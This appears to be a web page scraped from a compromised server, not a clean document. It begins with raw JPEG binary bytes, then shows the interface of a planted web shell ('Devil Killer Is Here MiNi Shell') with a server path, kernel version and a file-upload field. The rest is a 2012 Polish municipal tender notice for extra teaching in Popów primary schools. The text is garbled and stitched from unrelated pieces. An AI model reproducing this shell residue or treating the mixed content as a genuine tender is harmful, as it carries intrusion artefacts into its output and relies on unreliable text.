JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/38357-N-2012.html

<p class="kh_header"><b>Zawady: Świadczenie usługi edukacyjnej w projekcie o tytule Indywidualizacja nauczania klas I - III w gminie Popów</b><br>
<b>Numer ogłoszenia: 38357 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Popów Zawady , ul. Częstochowska 6, 42-110 Zawady, woj. śląskie, tel. 034 3177067, faks 034 3177067.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule Indywidualizacja nauczania klas I - III w gminie Popów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III. 
Celem głównym usługi jest wyrównywanie szans edukacyjnych oraz rozwinięcie zainteresowań poprzez indywidualizację procesu kształcenia dzieci z klas I - III w 100% szkół podstawowych funkcjonujących na terenie gminy Popów, tj.: SP w Popowie, SP w Wąsoszu Górnym, SP w Rębielicach Królewskich, SP w Więckach.
Cele szczegółowe projektu to
-	Zmniejszenie dysproporcji edukacyjnych i rozwojowych uczniów i uczennic szkół z gminy Popów poprzez udział w dodatkowych zajęciach wyrównawczych w terminie od 01.II.2012 do 31.I.2013 r.
-	Zwiększenie dostępności i ograniczenie wad wymowy uczniów i uczennic szkółpodstawowych w gminie Popów dzięki udziałowi w zajęciach logopedycznych w terminie od 01.II.2012 do 31.I.2013 r.
-	Rozwinięcie zainteresowań uczniów w zakresie nauk matematyczno-przyrodniczych w terminie od 01.II.2012 do 31.I.2013 r.
-	Stworzenie warunków w szkołach objętych wsparciem umożliwiających i wspomagających indywidualną pracę nauczyciela z uczniem poprzez doposażenie bazy dydaktycznej szkół z gminy Popów w niezbędne materiały dydaktyczne w terminie od 01.II.2012 do 31.I.2013 r.
W zajęciach z beneficjentami  poruszona zostanie kwestia  zasady równością szans kobiet i mężczyzn w życiu społecznym. Bezpośrednim realizatorem usługi (nauczycielem) z ramienia Wykonawcy (doświadczonej firmy szkoleniowej) będzie osoba, która posiada wykształcenie kierunkowe oraz praktykę.

2.	Szczegółowy opis przedmiotu zamówienia - zespół nauczycieli, zatrudnionych przez wykonawcę, stworzy program indywidualizacji (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:
a.	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu:
-	Ilość godzin - 462h łącznie dla wszystkich grup,
-	Ilość grup - 7
-	SP w Popowie 2 gr. 6-osobowe - 66 h,
-	SP w Wąsoszu Górnym 2 gr. 5-osobowe - 66 h,
-	SP w Rębielicach Królewskich 1 gr. 12-osobowa - 66 h,
-	SP w Więckach 2 gr. 6-osobowe - 66 h,
	Termin realizacji 
-	462h od dnia podpisania umowy do 31.I.2013 r.

b.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
-	Ilość godzin - 198h łącznie dla wszystkich grup,
-	Ilość grup - 3
-	SP w Popowie 1 gr. 6-osobowa - 66 h,
-	SP w Rębielicach Królewskich 1 gr. 6-osobowa - 66 h,
-	SP w Więckach 1 gr. 10-osobowa - 66 h,
	Termin realizacji 
-	198h od dnia podpisania umowy do 31.I.2013 r.
c.	Zajęcia logopedyczne:
-	Ilość godzin - 264h łącznie dla wszystkich grup,
-	Ilość grup - 4
-	SP w Popowie 2 gr. (6 i 5)-osobowe - 66 h,
-	SP w Rębielicach Królewskich 2 gr. 5-osobowe - 66 h,
	Termin realizacji 
-	264h od dnia podpisania umowy do 31.I.2013 r.

d.	Zajęcia gimnastyki korekcyjnej :
-	Ilość godzin - 132h łącznie dla wszystkich grup,
-	Ilość grup - 2
-	SP w Popowie 1 gr. 8-osobowa - 66 h,
-	SP w Wąsoszu Górnym 1 gr. 10-osobowa - 66 h,
	Termin realizacji 
-	132h od dnia podpisania umowy do 31.I.2013 r.

e.	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk matematyczno-przyrodniczych:
-	Ilość godzin - 330h łącznie dla wszystkich grup,
-	Ilość grup - 5
-	SP w Popowie 3 gr. (10 i 9)-osobowe - 66 h,
-	SP w Wąsoszu Górnym 1 gr. 10-osobowa - 66 h,
-	SP w Więckach 1 gr. 7-osobowa - 66 h,
	Termin realizacji 
-	330h od dnia podpisania umowy do 31.I.2013 r.

Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. 
Zaleca się, aby oferent dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty. 
Za wypadki i szkody powstałe podczas usługi odpowiada wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie wykonawca.

Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:

(rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci, klasy I - III SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. W związku z tym, że w budżecie projektu, w większości przypadków, są one podane z nazwy, Zamawiający na podst. art. 29 ust. 3 podaje ich nazwę własną dodając wyraz lub równoważny lub samą nazwę opisową)



1.	Doposażenie bazy dydaktycznej SP w Popowie:
-	dostawa pomocy dydaktycznych:
-	Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7 lub równoważny - 1 sztuka.
-	Pomoc dydaktyczna Zbiory zadań z matematyki zaproponowane przez wykonawcę - 28 sztuk,
-	Pomoc dydaktyczna Gry dydaktyczne zaproponowane przez wykonawcę - 15 zestawów,
-	Pomoc dydaktyczna Książeczki do uzupełniania zaproponowane przez wykonawcę - 30 sztuk,
-	Pomoc dydaktyczna Programy komputerowe, logop. i rozwijające zainteres. mat-przyr. zaproponowane przez wykonawcę - po 1 zestawie,
-	Pomoc dydaktyczna Albumy przyrodnicze zaproponowane przez wykonawcę - 5 sztuk,
-	Pomoc dydaktyczna Mikroskop lub równoważna; głowica: monokularowa pochyloną pod kątem 45o, okulary: WF 10x, obiektywy: achromatyczne 4x, 10x, 40x (S), powiększenia: 40x, 100x, 400x, koło filtrowe: 6 filtrów, regulacja ostrości: współosiowa śruba makro i mikrometryczna, oświetlenie: LED, górne,dolne, stolik: 90 x 90 mm ruchomy z mocowaniem preparatów - 2 sztuki,
-	Pomoc dydaktyczna Lornetka lub równoważna; powiększenie: 10x, średnica obiektywów: 50 mm, pryzmaty: BaK4, pole widzenia: 114 m  1000 m, źrenica wyjściowa: 5 mm, max. odległość od oka: 12 mm, min. odległość ostrzenia: 9 m, waga: 840 g 2 x 250 zł - 2 sztuki,
-	Pomoc dydaktyczna Kompas lub równoważna; śr. 60 mm - 5 sztuk,
2.	Doposażenie bazy dydaktycznej SP w Wąsoszu Górnym:
-	dostawa pomocy dydaktycznych:
-	Pomoc dydaktyczna Grafomotoryczna plansza magnetyczna lub równoważna; zawartość: drewniana plansza z pokrętłem o wymiarach 29,5 x 29,5 cm, 16 kuleczek magnetycznych w 4 kolorach, magnetyczny pisak z drewna zamocowany na sznureczku, 6 kart wzorcowych - 1 sztuka, 
-	Pomoc dydaktyczna Szlaczki grafomotoryczne - zestaw ćwiczeń lub równoważna; zawartość: 10 plansz z grubego tworzywa 33,5 x 22 cm, 10 przezroczystych osłonek, 3 flamastry suchościeralne, drewniane pudełko z pokrywką, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Suwaki sylabowe - windy lub równoważna; zawartość: format A4, 16 kolorowych kart (24 windy), zeszyt: A5 - 32 strony - 1 sztuka,
-	Pomoc dydaktyczna Detektyw Ortografek lub równoważna; format A4, str. 80 - 15 sztuk,
-	Pomoc dydaktyczna Dyslektyczne ucho lub równoważna; zbiór ćwiczeń - 20 sztuk,
-	Pomoc dydaktyczna Kontroler upływu czasu lub równoważna; zawartość: kontroler wyposażony w trzy światła, wyświetlanie w półokręgu 180 st., sygnalizator dźwiękowy - 6 różnych melodii o kontrolowanej poziomie głośności - 1 sztuka,
-	Pomoc dydaktyczna Piłka arytmetyczna - mnożenie przez 2-5-10 lub równoważna; śr. 40 cm - 1 sztuka,
-	Pomoc dydaktyczna Piłka arytmetyczna - mnożenie przez 3-4-6 lub równoważna; śr. 40 cm - 1 sztuka, 
-	Pomoc dydaktyczna Piłka arytmetyczna - mnożenie przez 7-8-9 lub równoważna; śr. 40 cm - 1 sztuka,
-	Pomoc dydaktyczna Piłka arytmetyczna - dzielenie lub równoważna; śr. 40 cm - 1 sztuka,
-	Pomoc dydaktyczna Spectrangle lub równoważna; zawartość: trójkątna plansza, 36 kostek trójkątnych, 8 pionków, worek, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Waga sprężynkowa duża lub równoważna; 100 kg - 1 sztuka,
-	Pomoc dydaktyczna Słomki konstukcyjne lub równoważna; zawartość: 232 słomki w 5 kolorach (dł. 20 cm, śr. 0,7 cm), 168 złączek (elementy wykonane z elastycznego tworzywa) - 2 zestawy,
-	Pomoc dydaktyczna Budujemy szkielety brył lub równoważna; zawartość: 180 kolorowych kulek o średnicy 1,6 cm (każda kulka posiada 26 otworów), 180 patyczków o długości od 1,6 do 7,5 cm, wykonane z solidnego tworzywa - 1 zestaw,
-	Pomoc dydaktyczna Geo strips lub równoważna; zawartość: 68 elementów o długości: 33,0 - 28,5 - 22,0 - 19,00 - 17,5 - 15,2 - 12,8 - 9,5 cm, 200 metalowych zatyczek - 1 zestaw,
-	Pomoc dydaktyczna Geoblocks lub równoważna; zawartość: 330 drewnianych graniastosłupów, 25 różnych kształtów - 1 zestaw,
-	Pomoc dydaktyczna Zestaw 6 pojemników do badania objętości lub równoważna; zawartość:  3 cylindry, 2 kostki i 1 półkulę, cztery pojemniki posiadają pojemności 1 litra każda, a pozostałe dwie posiadają 0,5 litrów każdy - 1 zestaw,
-	Pomoc dydaktyczna Ułamki w kole lub równoważna; zawartość: 5 kolorowych kół z tworzywa, podzielonych na 1|2 - 1|3 - 1|4 - 1|6 - 1|8 oraz całe koło, śr. 10 cm - 1  zestaw,
-	Pomoc dydaktyczna Globus biały lub równoważna; zawartość: biały globus z konturami państw, średnica 30 cm, wysokość 42 cm, 7 mazaków suchościeralnych w 7 kolorach - 1 sztuka,
-	Pomoc dydaktyczna Globus klasyczny lub równoważna; śr. kuli 320 mm - 1 sztuka,
-	Pomoc dydaktyczna Mikroskop ruchomy lub równoważna; przeźroczysty pojemnik w kształcie walca oraz estetyczna pokrywka, kształtem przypominająca owoc pomidora, powiększenie 10x,  wym. 6 x 12cm - 5 sztuk,
-	Pomoc dydaktyczna Megalupa lub równoważna; powiększenie 2x, wym. pudełka: śr. 10 cm, wys. 11,5 cm - 7 sztuk,
-	Pomoc dydaktyczna Preparaty mikroskopowe - zoologia, biologialub równoważna; 12 szkiełek z 36 różnymi preparatami, tj: grzyby, witaminy, algi, włókna, mikrofilm, skrobia, leki, pasikonik, włókna syntetyczne, plastik, napoje - 2 zestawy,
-	Pomoc dydaktyczna Stacja meteorologiczna lub równoważna; zawartość: wykonana z mocnego tworzywa, długość drążka 116 cm - 1 zestaw,
-	Pomoc dydaktyczna Igła magnetyczna lub równoważna; dł. igły 7,5 cm - 1 sztuka,
-	Pomoc dydaktyczna Odlewniki prehistoryczne lub równoważna; matryce do odlewów gipsowych 6 roślin i zwierząt żyjących w prehistorii, wym. 24 x 18cm - 1 zestaw,
-	Pomoc dydaktyczna Odlewniki - liście drzew zaproponowane przez wykonawcę - 1 zestaw,
-	Pomoc dydaktyczna Wałek - jeżyk lub równoważna; wymiary: długość 12,5cm, szerokość 6cm - 5 sztuk,
-	Pomoc dydaktyczna Drążki korekcyjne zaproponowane przez wykonawcę - 1 sztuka,
-	Pomoc dydaktyczna Wałek duży lub równoważna; dł. 120cm, śr. 30cm - 3 sztuki,
-	Pomoc dydaktyczna Piłka gimnastyczna lub równoważna; śr. 90 cm - 1 sztuka,
-	Pomoc dydaktyczna Półkule sensoryczne lub równoważna; śr. 16 cm, wys. 8 cm, 6 szt. w różnych kolorach - 1 zestaw,
-	Pomoc dydaktyczna Piłka sensoryczna lub równoważna; śr. 65 cm - 1 sztuka,

3.	Doposażenie bazy dydaktycznej SP w Rębielicach Królewskich:
-	dostawa pomocy dydaktycznych:
-	Pomoc dydaktyczna Wspomaganie rozwoju Tosia i Przyjaciele pomoc dydaktyczna do nauki czytania, program multimedialny - 1 sztuka,
-	Pomoc dydaktyczna Dmuchnij piłkę - magnetyczny labirynt lub równoważna; zawartość: obramowana plansza magnetyczna o wymiarze 45 x 32 cm, 20 drewnianych elementów magnetycznych (długość kijka 10 cm), 2 magnetyczne półkule, 3 piłeczki: pingpongowa, metalowa, drewniana, 100 słomek - 1 zestaw,
-	Pomoc dydaktyczna Liczydło kolorowe duże lub równoważna; śr. korali wynosi 2,5 cm, liczydła 5 x 20 doskonale nadają się do utrwalania szeregu liczbowego do 100 oraz do wykonywania działań arytmetycznych w zakresie 100  - 1 sztuka
-	Pomoc dydaktyczna Zbiór kolorowych dyktand kl. I-III lub równoważna; str. 32
wym: 166x235 - 12 sztuk,
-	Pomoc dydaktyczna Klocki Dienesa lub równoważna; zawartość: 60 klocków w 5 kształtach, 3 kolorach, 2 wielkościach, 2 grubościach, tacka do przechowywania, szablon, instrukcja, powierzchnia klocka od 10 cm3 do 30 cm3 - 1 zestaw,
-	Pomoc dydaktyczna Piramida logopedyczna L 1 lub równoważna; składa się z 30 zadań do utrwalania liter : ś - ć - ź - dź, (25 trójkątów) - 5 zestawów,
-	Pomoc dydaktyczna Gry dydaktyczne zaproponowane przez wykonawcę - 15 zestawów,
-	Pomoc dydaktyczna Grafomotoryczna plansza magnetyczna lub równoważna; zawartość: drewniana plansza z pokrętłem o wymiarach 29,5 x 29,5 cm, 16 kuleczek magnetycznych w 4 kolorach, magnetyczny pisak z drewna zamocowany na sznureczku, 6 kart wzorcowych - 1 sztuka,
-	Pomoc dydaktyczna Szlaczki grafomotoryczne - zestaw ćwiczeń lub równoważna; zawartość: 10 plansz z grubego tworzywa 33,5 x 22 cm, 10 przezroczystych osłonek, 3 flamastry suchościeralne, drewniane pudełko z pokrywką, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Suwaki sylabowe - windy lub równoważna; zawartość: format A4, 16 kolorowych kart (24 windy), zeszyt: A5 - 32 strony - 1 sztuka,
-	Pomoc dydaktyczna Detektyw Ortografeklub równoważna; format A4, str. 80 - 15 sztuk,
-	Pomoc dydaktyczna Dyslektyczne ucho lub równoważna; zbiór ćwiczeń - 20 sztuk,
-	Pomoc dydaktyczna Kontroler upływu czasu lub równoważna; zawartość: kontroler wyposażony w trzy światła, wyświetlanie w półokręgu 180 st., sygnalizator dźwiękowy - 6 różnych melodii o kontrolowanej poziomie głośności - 1 sztuka,
-	Pomoc dydaktyczna Piłka arytmetyczna - mnożenie przez 2-5-10 lub równoważna; śr. 40 cm - 1 sztuka,
-	Pomoc dydaktyczna Piłka arytmetyczna - mnożenie przez 3-4-6 lub równoważna; śr. 40 cm - 1 sztuka, 
-	Pomoc dydaktyczna Piłka arytmetyczna - mnożenie przez 7-8-9 lub równoważna; śr. 40 cm - 1 sztuka,
-	Pomoc dydaktyczna Piłka arytmetyczna - dzielenie lub równoważna; śr. 40 cm - 1 sztuka,
-	Pomoc dydaktyczna Spectrangle lub równoważna; zawartość: trójkątna plansza, 36 kostek trójkątnych, 8 pionków, worek, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Waga sprężynkowa duża lub równoważna; 100 kg - 1 sztuka,

4.	Doposażenie bazy dydaktycznej SP w Więckach:
-	dostawa pomocy dydaktycznych:
-	Pomoc dydaktyczna J. polski czytam i piszę lub równoważna; interaktywna gra edukacyjna - 4 sztuki,
-	Pomoc dydaktyczna Metoda dobrego startu od wierszyka do literki lub równoważna; zeszyt ćwiczeń zawiera materiał potrzebny do wprowadzenia 20 liter, dwuznaków i zmiękczeń (małych i wielkich) - 8 sztuk,
-	Pomoc dydaktyczna Warsztaty graficzne I lub równoważna; 4 teczki z tworzywa o wym. 21 x 30 cm, 30 kart z wzorami, 10 zmywalnych mazaków - 1 zestaw,
-	Pomoc dydaktyczna Warsztaty graficzne II lub równoważna; 4 teczki z tworzywa o wym. 21 x 30 cm, 30 kart z wzorami, 10 zmywalnych mazaków - 1 zestaw,
-	Pomoc dydaktyczna Rozsypanki obrazkowe I i IIlub równoważna; zestawy 60 kart A5 z podpisami umieszczonymi w liniaturze - po 1 zestawie,
-	Pomoc dydaktyczna Schattenmemory lub równoważna; zawartość: 6 szufladek, w każdej po 26 drewnianych płytek z obrazkami - 1 zestaw,
-	Pomoc dydaktyczna Gra kształty lub równoważna; 41 kolorowych, drewnianych żetonów (śr. 3,5 cm), 3 kostki z kształtami, plansza z tkaniny (śr. 45 cm) - 1 zestaw,
-	Pomoc dydaktyczna Dywanik glottodydaktyczny lub równoważna; dwa dywaniki: jeden z literkami podstawowymi, a drugi z literkami niepodstawowymi z zaznaczonym na nich kierunkiem kreślenia - 1 sztuka
-	Pomoc dydaktyczna Nauka ortografii z glottodywanikiem lub równoważna; poradnik wyjaśniający w przystępny sposób istotę i znaczenie pomocy dydaktycznej jaką jest dywanik glottodydaktyczny - 1 sztuka,
-	Pomoc dydaktyczna Mata matematyczna lub równoważna; mata winylowa o wym. 122 x 152 cm, 2 kostki piankowe z liczbami (dł. boku 12,7 cm), 1 kostka piankowa ze znakami plus i minus (dł. boku 12,7 cm), 28 kartonowych żetonów - 1 sztuka,
-	Pomoc dydaktyczna Matematyka na wesoło lub równoważna; program multimedialny - 6 sztuk, 
-	Pomoc dydaktyczna Fabryka zabawek, ZOO lub równoważna; program multimedialny - 4 sztuki,
-	Pomoc dydaktyczna Aby polubić matematykę lub równoważna; str: 120, wym: 200x295 - 1 sztuka,
-	Pomoc dydaktyczna Układanka poznajemy cyferki lub równoważna; wym. pudełka 24 x 14 x 3cm - 2 sztuki,
-	Pomoc dydaktyczna Logiczne mozaiki forma lub równoważna; elementy o boku 8,5cm - 1 sztuka,
-	Pomoc dydaktyczna Miarki szkolne lub równoważna; 10 szt., dł. 1m - 2 sztuki,
-	Pomoc dydaktyczna Dystansomierz lub równoważna; uchwyt z regulacją długości,
śr. tarczy 32 cm, max. długość uchwytu 78 cm - 1 sztuka, 
-	Pomoc dydaktyczna Globus fizyczny lub równoważna; śr. 22 cm - 2 sztuki, 
-	Pomoc dydaktyczna Globus polityczny lub równoważna; śr. 22 cm - 2 sztuki,
-	Pomoc dydaktyczna Anemometr lub równoważna; wym. 28cm x 19cm - 1 sztuka,
-	Pomoc dydaktyczna Stacja pogody lub równoważna; zdalnie sterowana godzina i data, możliwość regulacji ręcznej, strefa czasowa +|- 12 godzin, wyświetlacz 24 godziny, budzik z funkcją Snooze, temperatura w pomieszczeniu, pomiar temperatury w pomieszczeniu co 10 sekund, pogoda i barometr wyświetlane za pomocą ikon, wyświetlanie tendencji, temperatura na zewnątrz, ciągły pomiar temperatury na zewnątrz, zasilanie: 2 baterie AAA do przekaźnika i 3 baterie AA do odbiornika - 2 sztuki,
-	Pomoc dydaktyczna Sortowanie odpadów lub równoważna; gra, lakierowane kart połączonych sprężynowo w książeczkę, wym. 28,5 x 10,5cm - 1 sztuka,
-	Pomoc dydaktyczna Mikroskop lub równoważna; zestaw składa się z 36 elementów, w tym: mikroskop z obiektywami powiększającymi 100, 450 i 900 razy, 1 szkło powiększające, 2 fiolki na odczynniki, 5 przykrywek, 10 czystych etykietek, 1 pęseta, 1 igła do rozcinania, 12 pustych szkiełek na preparaty, 1 gotowy preparat,1 zapasowa żaróweczka - 3 sztuki,
-	Pomoc dydaktyczna Preparaty mikroskopowe lub równoważna; 12 szkiełek z 36 różnymi preparatami, tj: grzyby, witaminy, algi, włókna, mikrofilm, skrobia, leki, pasikonik, włókna syntetyczne, plastik, napoje - 3 zestawy,
-	Pomoc dydaktyczna Akcesoria do mikroskopu zaproponowane przez wykonawcę - 1 sztuka,
-	Pomoc dydaktyczna Podręcznik eksperymentów str. 128, wym. 130 x 195 - 1 sztuka,
-	Pomoc dydaktyczna Mapa Polski lub równoważna; format 160 x 120 cm - 1 sztuka,
-	Pomoc dydaktyczna Poznajemy miasta Polski lub równoważna; 20 plansz A3 przedstawiających charakterystyczne obiekty wybranych miast Polski: Warszawy, Gdańska, Krakowa i Łodzi - 1 sztuka,
-	Pomoc dydaktyczna Wiatrometr lub równoważna; wykonany z kolorowego plastiku, posiada 4 obracające się ramiona, połączone ze wskaźnikiem odwzorowującym siłę wiatru, wys. ok. 33 cm - 1 sztuka,
-	Pomoc dydaktyczna Lupy lub równoważna; szkiełko powiększające śr. 10, 5cm, gumowa rączka do trzymania, wys. 20 cm - 7 sztuk,
-	Pomoc dydaktyczna Nasze ciało - plansza lub równoważna; wym. 87 x 62 cm, plansza dwustronna - 1 sztuka,
-	Pomoc dydaktyczna Programy multimedialne do czyt., pisania, matem. zaproponowane przez wykonawcę - po 1 zestawie,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
